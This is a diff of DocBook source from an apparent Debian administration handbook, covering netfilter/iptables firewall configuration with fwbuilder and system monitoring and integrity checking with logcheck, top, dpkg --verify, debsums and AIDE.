+			The lack of a standard configuration (and the “process, not product” motto) explains the lack of a turn-key solution. There are, however, tools that make it simpler to configure the <emphasis>netfilter</emphasis> firewall, with a graphical representation of the filtering rules. <command>fwbuilder</command> is undoubtedly among the best of them.
+		</para>
+		 <indexterm>
+			<primary><emphasis>netfilter</emphasis></primary>
+		</indexterm>
+		 <sidebar> <title><emphasis>SPECIFIC CASE</emphasis> Local Firewall</title>
+		 <para>
+			A firewall can be restricted to one particular machine (as opposed to a complete network), in which case its role is to filter or limit access to some services, or possibly to prevent outgoing connections by rogue software that a user could, willingly or not, have installed.
+		</para>
+		 </sidebar> <para>
+			The Linux kernel embeds the <emphasis>netfilter</emphasis> firewall. It can be controlled from user space with the <command>iptables</command> and <command>ip6tables</command> commands. The difference between these two commands is that the former acts on the IPv4 network, whereas the latter acts on IPv6. Since both network protocol stacks will probably be around for many years, both tools will need to be used in parallel.
+		</para>
+		 <indexterm>
+			<primary><command>iptables</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>ip6tables</command></primary>
+		</indexterm>
+		 <section id="sect.netfilter">
+			<title>Netfilter Behavior</title>
+			 <para>
+				<emphasis>netfilter</emphasis> uses four distinct tables which store rules regulating three kinds of operations on packets:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>filter</literal> concerns filtering rules (accepting, refusing or ignoring a packet);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>nat</literal> concerns translation of source or destination addresses and ports of packages;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>mangle</literal> concerns other changes to the IP packets (including the ToS — <emphasis>Type of Service</emphasis> — field and options);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>raw</literal> allows other manual modifications on packets before they reach the connection tracking system.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Each table contains lists of rules called <emphasis>chains</emphasis>. The firewall uses standard chains to handle packets based on predefined circumstances. The administrator can create other chains, which will only be used when referred to by one of the standard chains (either directly or indirectly).
+			</para>
+			 <indexterm>
+				<primary>chain</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>filtering rule</primary>
+			</indexterm>
+			 <para>
+				The <literal>filter</literal> table has three standard chains:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>INPUT</literal>: concerns packets whose destination is the firewall itself;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>OUTPUT</literal>: concerns packets emitted by the firewall;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>FORWARD</literal>: concerns packets transiting through the firewall (which is neither their source nor their destination).
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				The <literal>nat</literal> table also has three standard chains:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>PREROUTING</literal>: to modify packets as soon as they arrive;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>POSTROUTING</literal>: to modify packets when they are ready to go on their way;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>OUTPUT</literal>: to modify packets generated by the firewall itself.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <figure id="figure.chaines-netfilter">
+				<title>How <emphasis>netfilter</emphasis> chains are called</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/netfilter.png" format="PNG" scalefit="1" width="65%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <para>
+				Each chain is a list of rules; each rule is a set of conditions and an action to execute when the conditions are met. When processing a packet, the firewall scans the appropriate chain, one rule after another; when the conditions for one rule are met, it “jumps” (hence the <literal>-j</literal> option in the commands) to the specified action to continue processing. The most common behaviors are standardized, and dedicated actions exist for them. Taking one of these standard actions interrupts the processing of the chain, since the packet's fate is already sealed (barring an exception mentioned below):
+			</para>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> ICMP</title>
+			 <para>
+				ICMP (<emphasis>Internet Control Message </emphasis>Protocol) is the protocol used to transmit complementary information on communications. It allows testing network connectivity with the <command>ping</command> command (which sends an ICMP <emphasis>echo request</emphasis> message, which the recipient is meant to answer with an ICMP <emphasis>echo reply</emphasis> message). It signals a firewall rejecting a packet, indicates an overflow in a receive buffer, proposes a better route for the next packets in the connection, and so on. This protocol is defined by several RFC documents; the initial RFC777 and RFC792 were soon completed and extended. <ulink type="block" url="http://www.faqs.org/rfcs/rfc777.html" /> <ulink type="block" url="http://www.faqs.org/rfcs/rfc792.html" />
+			</para>
+			 <para>
+				For reference, a receive buffer is a small memory zone storing data between the time it arrives from the network and the time the kernel handles it. If this zone is full, new data cannot be received, and ICMP signals the problem, so that the emitter can slow down its transfer rate (which should ideally reach an equilibrium after some time).
+			</para>
+			 <indexterm>
+				<primary>ICMP</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Internet Control Message Protocol</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>receive buffer</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>buffer</primary>
+				<secondary>receive buffer</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>ping</command></primary>
+			</indexterm>
+			 <para>
+				Note that although an IPv4 network can work without ICMP, ICMPv6 is strictly required for an IPv6 network, since it combines several functions that were, in the IPv4 world, spread across ICMPv4, IGMP (<emphasis>Internet Group Membership Protocol</emphasis>) and ARP (<emphasis>Address Resolution Protocol</emphasis>). ICMPv6 is defined in RFC4443. <ulink type="block" url="http://www.faqs.org/rfcs/rfc4443.html" />
+			</para>
+			 </sidebar> <para>
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<literal>ACCEPT</literal>: allow the packet to go on its way;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>REJECT</literal>: reject the packet with an ICMP error packet (the <literal>--reject-with <replaceable>type</replaceable></literal> option to <command>iptables</command> allows selecting the type of error);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>DROP</literal>: delete (ignore) the packet;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>LOG</literal>: log (via <command>syslogd</command>) a message with a description of the packet; note that this action does not interrupt processing, and the execution of the chain continues at the next rule, which is why logging refused packets requires both a LOG and a REJECT/DROP rule;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>ULOG</literal>: log a message via <command>ulogd</command>, which can be better adapted and more efficient than <command>syslogd</command> for handling large numbers of messages; note that this action, like LOG, also returns processing to the next rule in the calling chain;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<replaceable>chain_name</replaceable>: jump to the given chain and evaluate its rules;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>RETURN</literal>: interrupt processing of the current chain, and return to the calling chain; in case the current chain is a standard one, there's no calling chain, so the default action (defined with the <literal>-P</literal> option to <command>iptables</command>) is executed instead;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>SNAT</literal> (only in the <literal>nat</literal> table): apply <emphasis>Source NAT</emphasis> (extra options describe the exact changes to apply);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>DNAT</literal> (only in the <literal>nat</literal> table): apply <emphasis>Destination NAT</emphasis> (extra options describe the exact changes to apply);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>MASQUERADE</literal> (only in the <literal>nat</literal> table): apply <emphasis>masquerading</emphasis> (a special case of <emphasis>Source NAT</emphasis>);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						<literal>REDIRECT</literal> (only in the <literal>nat</literal> table): redirect a packet to a given port of the firewall itself; this can be used to set up a transparent web proxy that works with no configuration on the client side, since the client thinks it connects to the recipient whereas the communications actually go through the proxy.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Other actions, particularly those concerning the <literal>mangle</literal> table, are outside the scope of this text. The <citerefentry><refentrytitle>iptables</refentrytitle>
+				 <manvolnum>8</manvolnum></citerefentry> and <citerefentry><refentrytitle>ip6tables</refentrytitle>
+				 <manvolnum>8</manvolnum></citerefentry> have a comprehensive list.
+			</para>
+
+		</section>
+		 <section id="sect.iptables">
+			<title>Syntax of <command>iptables</command> and <command>ip6tables</command></title>
+			 <para>
+				The <command>iptables</command> and <command>ip6tables</command> commands allow manipulating tables, chains and rules. Their <literal>-t <replaceable>table</replaceable></literal> option indicates which table to operate on (by default, <literal>filter</literal>).
+			</para>
+			 <indexterm>
+				<primary><command>iptables</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>ip6tables</command></primary>
+			</indexterm>
+			 <section id="sect.iptables-command">
+				<title>Commands</title>
+				 <para>
+					The <literal>-N <replaceable>chain</replaceable></literal> option creates a new chain. The <literal>-X <replaceable>chain</replaceable></literal> deletes an empty and unused chain. The <literal>-A <replaceable>chain</replaceable> <replaceable>rule</replaceable></literal> adds a rule at the end of the given chain. The <literal>-I <replaceable>chain</replaceable> <replaceable>rule_num</replaceable> <replaceable>rule</replaceable></literal> option inserts a rule before the rule number <replaceable>rule_num</replaceable>. The <literal>-D <replaceable>chain</replaceable> <replaceable>rule_num</replaceable></literal> (or <literal>-D <replaceable>chain</replaceable> <replaceable>rule</replaceable></literal>) option deletes a rule in a chain; the first syntax identifies the rule to be deleted by its number, while the latter identifies it by its contents. The <literal>-F <replaceable>chain</replaceable></literal> option flushes a chain (deletes all its rules); if no chain is mentioned, all the rules in the table are deleted. The <literal>-L <replaceable>chain</replaceable></literal> option lists the rules in the chain. Finally, the <literal>-P <replaceable>chain</replaceable> <replaceable>action</replaceable></literal> option defines the default action, or “policy”, for a given chain; note that only standard chains can have such a policy.
+				</para>
+
+			</section>
+			 <section id="sect.iptables-rules">
+				<title>Rules</title>
+				 <indexterm>
+					<primary>filtering rule</primary>
+				</indexterm>
+				 <para>
+					Each rule is expressed as <literal><replaceable>conditions</replaceable> -j <replaceable>action</replaceable> <replaceable>action_options</replaceable></literal>. If several conditions are described in the same rule, then the criterion is the conjunction (logical <emphasis>and</emphasis>) of the conditions, which is at least as restrictive as each individual condition.
+				</para>
+				 <para>
+					The <literal>-p <replaceable>protocol</replaceable></literal> condition matches the protocol field of the IP packet. The most common values are <literal>tcp</literal>, <literal>udp</literal>, <literal>icmp</literal>, and <literal>icmpv6</literal>. Prefixing the condition with an exclamation mark negates the condition, which then becomes a match for “any packets with a different protocol than the specified one”. This negation mechanism is not specific to the <literal>-p</literal> option and it can be applied to all other conditions too.
+				</para>
+				 <para>
+					The <literal>-s <replaceable>address</replaceable></literal> or <literal>-s <replaceable>network/mask</replaceable></literal> condition matches the source address of the packet. Correspondingly, <literal>-d <replaceable>address</replaceable></literal> or <literal>-d <replaceable>network/mask</replaceable></literal> matches the destination address.
+				</para>
+				 <para>
+					The <literal>-i <replaceable>interface</replaceable></literal> condition selects packets coming from the given network interface. <literal>-o <replaceable>interface</replaceable></literal> selects packets going out on a specific interface.
+				</para>
+				 <para>
+					There are more specific conditions, depending on the generic conditions described above. For instance, the <literal>-p tcp</literal> condition can be complemented with conditions on the TCP ports, with clauses such as <literal>--source-port <replaceable>port</replaceable></literal> and <literal>--destination-port <replaceable>port</replaceable></literal>.
+				</para>
+				 <para>
+					The <literal>--state <replaceable>state</replaceable></literal> condition matches the state of a packet in a connection (this requires the <command>ipt_conntrack</command> kernel module, for connection tracking). The <literal>NEW</literal> state describes a packet starting a new connection; <literal>ESTABLISHED</literal> matches packets belonging to an already existing connection, and <literal>RELATED</literal> matches packets initiating a new connection related to an existing one (which is useful for the <literal>ftp-data</literal> connections in the “active” mode of the FTP protocol).
+				</para>
+				 <para>
+					The previous section lists available actions, but not their respective options. The <literal>LOG</literal> action, for instance, has the following options:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							<literal>--log-level</literal>, with default value <literal>warning</literal>, indicates the <command>syslog</command> severity level;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<literal>--log-prefix</literal> allows specifying a text prefix to differentiate between logged messages;
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							<literal>--log-tcp-sequence</literal>, <literal>--log-tcp-options</literal> and <literal>--log-ip-options</literal> indicate extra data to be integrated into the message: respectively, the TCP sequence number, TCP options, and IP options.
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <para>
+					The <literal>DNAT</literal> action provides the <literal>--to-destination <replaceable>address</replaceable>:<replaceable>port</replaceable></literal> option to indicate the new destination IP address and/or port. Similarly, <literal>SNAT</literal> provides <literal>--to-source <replaceable>address</replaceable>:<replaceable>port</replaceable></literal> to indicate the new source IP address and/or port.
+				</para>
+				 <para>
+					The <literal>REDIRECT</literal> action (only available if NAT is available) provides the <literal>--to-ports <replaceable>port(s)</replaceable></literal> option to indicate the port, or port range, where the packets should be redirected.
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.creating-rules">
+			<title>Creating Rules</title>
+			 <para>
+				Each rule creation requires one invocation of <command>iptables</command>/<command>ip6tables</command>. Typing these commands manually can be tedious, so the calls are usually stored in a script so that the same configuration is set up automatically every time the machine boots. This script can be written by hand, but it can also be interesting to prepare it with a high-level tool such as <command>fwbuilder</command>.
+			</para>
+			 
+<screen>
+<computeroutput># </computeroutput><userinput>apt install fwbuilder</userinput></screen>
+			 <para>
+				The principle is simple. In the first step, one needs to describe all the elements that will be involved in the actual rules:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						the firewall itself, with its network interfaces;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the networks, with their corresponding IP ranges;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the servers;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the ports belonging to the services hosted on the servers.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				The rules are then created with simple drag-and-drop actions on the objects. A few contextual menus can change the condition (negating it, for instance). Then the action needs to be chosen and configured.
+			</para>
+			 <para>
+				As far as IPv6 is concerned, one can either create two distinct rulesets for IPv4 and IPv6, or create only one and let <command>fwbuilder</command> translate the rules according to the addresses assigned to the objects.
+			</para>
+			 <figure id="figure.fwbuilder">
+				<title>Fwbuilder's main window</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/fwbuilder.png" format="PNG" scalefit="1" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <indexterm>
+				<primary><command>fwbuilder</command></primary>
+			</indexterm>
+			 <para>
+				<command>fwbuilder</command> can then generate a script configuring the firewall according to the rules that have been defined. Its modular architecture gives it the ability to generate scripts targeting different systems (<command>iptables</command> for Linux, <command>ipf</command> for FreeBSD and <command>pf</command> for OpenBSD).
+			</para>
+
+		</section>
+		 <section id="sect.install-rules-at-boot">
+			<title>Installing the Rules at Each Boot</title>
+			 <para>
+				In other cases, the recommended way is to register the configuration script in an <literal>up</literal> directive of the <filename>/etc/network/interfaces</filename> file. In the following example, the script is stored under <filename>/usr/local/etc/arrakis.fw</filename>.
+			</para>
+			 <example id="example.network-interfaces-firewall">
+				<title><filename>interfaces</filename> file calling firewall script</title>
+				 
+<programlisting>auto eth0
+iface eth0 inet static
+    address 192.168.0.1
+    network 192.168.0.0
+    netmask 255.255.255.0
+    broadcast 192.168.0.255
+    up /usr/local/etc/arrakis.fw
+</programlisting>
+
+			</example>
+			 <para>
+				This obviously assumes that you are using <emphasis role="pkg">ifupdown</emphasis> to configure the network interfaces. If you are using something else (like <emphasis>NetworkManager</emphasis> or <emphasis>systemd-networkd</emphasis>), then refer to their respective documentation to find out ways to execute a script after the interface has been brought up.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.supervision">
+		<title>Supervision: Prevention, Detection, Deterrence</title>
+		 <indexterm>
+			<primary>monitoring</primary>
+		</indexterm>
+		 <para>
+			Monitoring is an integral part of any security policy for several reasons. Among them, that the goal of security is usually not restricted to guaranteeing data confidentiality, but it also includes ensuring availability of the services. It is therefore imperative to check that everything works as expected, and to detect in a timely manner any deviant behavior or change in quality of the service(s) rendered. Monitoring activity can help detecting intrusion attempts and enable a swift reaction before they cause grave consequences. This section reviews some tools that can be used to monitor several aspects of a Debian system. As such, it completes <xref linkend="sect.monitoring" />.
+		</para>
+		 <section id="sect.logcheck">
+			<title>Monitoring Logs with <command>logcheck</command></title>
+			 <indexterm>
+				<primary><command>logcheck</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>logs</primary>
+				<secondary>monitoring</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>monitoring</primary>
+				<secondary>log files</secondary>
+			</indexterm>
+			 <para>
+				The <command>logcheck</command> program monitors log files every hour by default. It sends unusual log messages in emails to the administrator for further analysis.
+			</para>
+			 <para>
+				The list of monitored files is stored in <filename>/etc/logcheck/logcheck.logfiles</filename>; the default values work fine if the <filename>/etc/rsyslog.conf</filename> file has not been completely overhauled.
+			</para>
+			 <para>
+				<command>logcheck</command> can work in one of three more or less detailed modes: <emphasis>paranoid</emphasis>, <emphasis>server</emphasis> and <emphasis>workstation</emphasis>. The first one is <emphasis>very</emphasis> verbose, and should probably be restricted to specific servers such as firewalls. The second (and default) mode is recommended for most servers. The last one is designed for workstations, and is even terser (it filters out more messages).
+			</para>
+			 <para>
+				In all three cases, <command>logcheck</command> should probably be customized to exclude some extra messages (depending on installed services), unless the admin really wishes to receive hourly batches of long uninteresting emails. Since the message selection mechanism is rather complex, <filename>/usr/share/doc/logcheck-database/README.logcheck-database.gz</filename> is a required — if challenging — read.
+			</para>
+			 <para>
+				The applied rules can be split into several types:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						those that qualify a message as a cracking attempt (stored in a file in the <filename>/etc/logcheck/cracking.d/</filename> directory);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						those canceling such a qualification (<filename>/etc/logcheck/cracking.ignore.d/</filename>);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						those classifying a message as a security alert (<filename>/etc/logcheck/violations.d/</filename>);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						those canceling this classification (<filename>/etc/logcheck/violations.ignore.d/</filename>);
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						finally, those applying to the remaining messages (considered as <emphasis>system events</emphasis>).
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> Ignoring a message</title>
+			 <para>
+				Any message tagged as a cracking attempt or a security alert (following a rule stored in a <filename>/etc/logcheck/violations.d/myfile</filename> file) can only be ignored by a rule in a <filename>/etc/logcheck/violations.ignore.d/myfile</filename> or <filename>/etc/logcheck/violations.ignore.d/myfile-<replaceable>extension</replaceable></filename> file.
+			</para>
+			 </sidebar> <para>
+				A system event is always signaled unless a rule in one of the <filename>/etc/logcheck/ignore.d.{paranoid,server,workstation}/</filename> directories states the event should be ignored. Of course, the only directories taken into account are those corresponding to verbosity levels equal or greater than the selected operation mode.
+			</para>
+
+		</section>
+		 <section id="sect.monitoring-activity">
+			<title>Monitoring Activity</title>
+			 <indexterm>
+				<primary>monitoring</primary>
+				<secondary>activity</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>activity, monitoring</primary>
+			</indexterm>
+			 <section id="sect.real-time-monitoring">
+				<title>In Real Time</title>
+				 <para>
+					<command>top</command> is an interactive tool that displays a list of currently running processes. The default sorting is based on the current amount of processor use and can be obtained with the <keycap>P</keycap> key. Other sort orders include a sort by occupied memory (<keycap>M</keycap> key), by total processor time (<keycap>T</keycap> key) and by process identifier (<keycap>N</keycap> key). The <keycap>k</keycap> key allows killing a process by entering its process identifier. The <keycap>r</keycap> key allows <emphasis>renicing</emphasis> a process, i.e. changing its priority.
+				</para>
+				 <indexterm>
+					<primary><command>top</command></primary>
+				</indexterm>
+				 <para>
+					When the system seems to be overloaded, <command>top</command> is a great tool to see which processes are competing for processor time or consume too much memory. In particular, it is often interesting to check if the processes consuming resources match the real services that the machine is known to host. An unknown process running as the www-data user should really stand out and be investigated, since it's probably an instance of software installed and executed on the system through a vulnerability in a web application.
+				</para>
+				 <para>
+					<command>top</command> is a very flexible tool and its manual page gives details on how to customize its display and adapt it to one's personal needs and habits.
+				</para>
+				 <para>
+					The <command>gnome-system-monitor</command> graphical tool is similar to <command>top</command> and it provides roughly the same features.
+				</para>
+				 <indexterm>
+					<primary><command>gnome-system-monitor</command></primary>
+				</indexterm>
+
+			</section>
+			 <section id="sect.monitoring-history">
+				<title>History</title>
+				 <indexterm>
+					<primary>activity, history</primary>
+				</indexterm>
+				 <para>
+					Processor load, network traffic and free disk space are information that are constantly varying. Keeping a history of their evolution is often useful in determining exactly how the computer is used.
+				</para>
+				 <indexterm>
+					<primary>SNMP</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Simple Network Management Protocol</primary>
+				</indexterm>
+				 <para>
+					There are many dedicated tools for this task. Most can fetch data via SNMP (<emphasis>Simple Network Management Protocol</emphasis>) in order to centralize this information. An added benefit is that this allows fetching data from network elements that may not be general-purpose computers, such as dedicated network routers or switches.
+				</para>
+				 <para>
+					This book deals with Munin in some detail (see <xref linkend="sect.munin" />) as part of <xref linkend="advanced-administration" xrefstyle="select: label  quotedtitle" />. Debian also provides a similar tool, <emphasis role="pkg">cacti</emphasis>. Its deployment is slightly more complex, since it is based solely on SNMP. Despite having a web interface, grasping the concepts involved in configuration still requires some effort. Reading the HTML documentation (<filename>/usr/share/doc/cacti/html/index.html</filename>) should be considered a prerequisite.
+				</para>
+				 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> <command>mrtg</command></title>
+				 <indexterm>
+					<primary><command>mrtg</command></primary>
+				</indexterm>
+				 <para>
+					<command>mrtg</command> (in the similarly-named package) is an older tool. Despite some rough edges, it can aggregate historical data and display them as graphs. It includes a number of scripts dedicated to collecting the most commonly monitored data such as processor load, network traffic, web page hits, and so on.
+				</para>
+				 <para>
+					The <emphasis role="pkg">mrtg-contrib</emphasis> and <emphasis role="pkg">mrtgutils</emphasis> packages contain example scripts that can be used directly.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+		 <section>
+			<title>Detecting Changes</title>
+			 <para>
+				Once the system is installed and configured, and barring security upgrades, there's usually no reason for most of the files and directories to evolve, data excepted. It is therefore interesting to make sure that files actually do not change: any unexpected change would therefore be worth investigating. This section presents a few tools able to monitor files and to warn the administrator when an unexpected change occurs (or simply to list such changes).
+			</para>
+			 <section id="sect.dpkg-verify">
+				<title>Auditing Packages with <command>dpkg --verify</command></title>
+				 <indexterm>
+					<primary><command>dpkg</command></primary>
+					<secondary><command>dpkg --verify</command></secondary>
+				</indexterm>
+				 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Protecting against upstream changes</title>
+				 <para>
+					<command>dpkg --verify</command> is useful in detecting changes to files coming from a Debian package, but it will be useless if the package itself is compromised, for instance if the Debian mirror is compromised. Protecting against this class of attacks involves using APT's digital signature verification system (see <xref linkend="sect.package-authentication" />), and taking care to only install packages from a certified origin.
+				</para>
+				 </sidebar> <para>
+					<command>dpkg --verify</command> (or <command>dpkg -V</command>) is an interesting tool since it allows finding what installed files have been modified (potentially by an attacker), but this should be taken with a grain of salt. To do its job it relies on checksums stored in dpkg's own database which is stored on the hard disk (they can be found in <filename>/var/lib/dpkg/info/<replaceable>package</replaceable>.md5sums</filename>); a thorough attacker will therefore update these files so they contain the new checksums for the subverted files.
+				</para>
+				 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> File fingerprint</title>
+				 <indexterm>
+					<primary>fingerprint</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>control sum</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>MD5</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>SHA1</primary>
+				</indexterm>
+				 <para>
+					As a reminder: a fingerprint is a value, often a number (even though in hexadecimal notation), that contains a kind of signature for the contents of a file. This signature is calculated with an algorithm (MD5 or SHA1 being well-known examples) that more or less guarantee that even the tiniest change in the file contents implies a change in the fingerprint; this is known as the “avalanche effect”. This allows a simple numerical fingerprint to serve as a litmus test to check whether the contents of a file have been altered. These algorithms are not reversible; in other words, for most of them, knowing a fingerprint doesn't allow finding the corresponding contents. Recent mathematical advances seem to weaken the absoluteness of these principles, but their use is not called into question so far, since creating different contents yielding the same fingerprint still seems to be quite a difficult task.
+				</para>
+				 </sidebar> <para>
+					Running <command>dpkg -V</command> will verify all installed packages and will print out a line for each file with a failing test. The output format is the same as the one of <command>rpm -V</command> where each character denotes a test on some specific meta-data. Unfortunately <command>dpkg</command> does not store the meta-data needed for most tests and will thus output question marks for them. Currently only the checksum test can yield a "5" on the third character (when it fails).
+				</para>
+				 
+<screen>
+<computeroutput># </computeroutput><userinput>dpkg -V</userinput>
+<computeroutput>??5??????   /lib/systemd/system/ssh.service
+??5?????? c /etc/libvirt/qemu/networks/default.xml
+??5?????? c /etc/lvm/lvm.conf
+??5?????? c /etc/salt/roster</computeroutput></screen>
+				 <para>
+					In the sample above, dpkg reports a change to SSH's service file that the administrator made to the packaged file instead of using an appropriate <filename>/etc/systemd/system/ssh.service</filename> override (which would be stored below <filename>/etc</filename> like any configuration change should be). It also lists multiple configuration files (identified by the "c" letter on the second field) that had been legitimately modified.
+				</para>
+
+			</section>
+			 <section id="sect.debsums">
+				<title>Auditing Packages: <command>debsums</command> and its Limits</title>
+				 <indexterm>
+					<primary><command>debsums</command></primary>
+				</indexterm>
+				 <para>
+					<command>debsums</command> is the ancestor of <command>dpkg -V</command> and is thus mostly obsolete. It suffers from the same limitations than dpkg. Fortunately, some of the limitations can be worked-around (whereas dpkg does not offer similar work-arounds).
+				</para>
+				 <para>
+					Since the data on the disk cannot be trusted, <command>debsums</command> offers to do its checks based on <filename>.deb</filename> files instead of relying on dpkg's database. To download trusted <filename>.deb</filename> files of all the packages installed, we can rely on APT's authenticated downloads. This operation can be slow and tedious, and should therefore not be considered a proactive technique to be used on a regular basis.
+				</para>
+				 
+<screen>
+<computeroutput># </computeroutput><userinput>apt-get --reinstall -d install `grep-status -e 'Status: install ok installed' -n -s Package`</userinput>
+<computeroutput>[ ... ]
+# </computeroutput><userinput>debsums -p /var/cache/apt/archives --generate=all</userinput></screen>
+				 <para>
+					Note that this example uses the <command>grep-status</command> command from the <emphasis role="pkg">dctrl-tools</emphasis> package, which is not installed by default.
+				</para>
+
+			</section>
+			 <section>
+				<title>Monitoring Files: AIDE</title>
+				 <indexterm>
+					<primary><emphasis role="pkg">aide</emphasis> (Debian package)</primary>
+				</indexterm>
+				 <para>
+					The AIDE tool (<emphasis>Advanced Intrusion Detection Environment</emphasis>) allows checking file integrity, and detecting any change against a previously recorded image of the valid system. This image is stored as a database (<filename>/var/lib/aide/aide.db</filename>) containing the relevant information on all files of the system (fingerprints, permissions, timestamps and so on). This database is first initialized with <command>aideinit</command>; it is then used daily (by the <filename>/etc/cron.daily/aide</filename> script) to check that nothing relevant changed. When changes are detected, AIDE records them in log files (<filename>/var/log/aide/*.log</filename>) and sends its findings to the administrator by email.
+				</para>
+				 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Protecting the database</title>
+				 <para>
+					Since AIDE uses a local database to compare the states of the files, the validity of its results is directly linked to the validity of the database. If an attacker gets root permissions on a compromised system, they will be able to replace the database and cover their tracks. A possible workaround would be to store the reference data on read-only storage media.
+				</para>
+				 </sidebar> <para>
+					Many options in <filename>/etc/default/aide</filename> can be used to tweak the behavior of the <emphasis role="pkg">aide</emphasis> package. The AIDE configuration proper is stored in <filename>/etc/aide/aide.conf</filename> and <filename>/etc/aide/aide.conf.d/</filename> (actually, these files are only used by <command>update-aide.conf</command> to generate <filename>/var/lib/aide/aide.conf.autogenerated</filename>). Configuration indicates which properties of which files need to be checked. For instance, the contents of log files changes routinely, and such changes can be ignored as long as the permissions of these files stay the same, but both contents and permissions of executable programs must be constant. Although not very complex, the configuration syntax is not fully intuitive, and reading the <citerefentry><refentrytitle>aide.conf</refentrytitle>
+					 <manvolnum>5</manvolnum></citerefentry> manual page is therefore recommended.
+				</para>
+				 <para>
+					A new version of the database is generated daily in <filename>/var/lib/aide/aide.db.new</filename>; if all recorded changes were legitimate, it can be used to replace the reference database.
+				</para>
+				 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Tripwire and Samhain</title>
+				 <para>
+					Tripwire is very similar to AIDE; even the configuration file syntax is almost the same. The main addition provided by <emphasis role="pkg">tripwire</emphasis> is a mechanism to sign the configuration file, so that an attacker cannot make it point at a different version of the reference database.
+				</para>
+				 <para>
+					Samhain also offers similar features, as well as some functions to help detecting rootkits (see the sidebar <xref linkend="sidebar.the-checksecurity-and-chkrootkit-rkhunter-packages" />). It can also be deployed globally on a network, and record its traces on a central server (with a signature).
+				</para>
+				 </sidebar> <sidebar id="sidebar.the-checksecurity-and-chkrootkit-rkhunter-packages"> <title><emphasis>QUICK LOOK</emphasis> The <emphasis role="pkg">checksecurity</emphasis> and <emphasis role="pkg">chkrootkit</emphasis>/<emphasis role="pkg">rkhunter</emphasis> packages</title>
+				 <indexterm>
+					<primary><emphasis role="pkg">checksecurity</emphasis></primary>
+				</indexterm>
+				 <para>
+					The first of these packages contains several small scripts performing basic checks on the system (empty passwords, new setuid files, and so on) and warning the administrator if required. Despite its explicit name, an administrator should not rely solely on it to make sure a Linux system is secure.
+				</para>
+				 <para>
+					The <emphasis role="pkg">chkrootkit</emphasis> and <emphasis role="pkg">rkhunter</emphasis> packages allow looking for <emphasis>rootkits</emphasis> potentially installed on the system. As a reminder, these are pieces of software designed to hide the compromise of a system while discreetly keeping control of the machine. The tests are not 100% reliable, but they can usually draw the administrator's attention to potential problems.
+				</para>
+				 </sidebar>
+			</section>
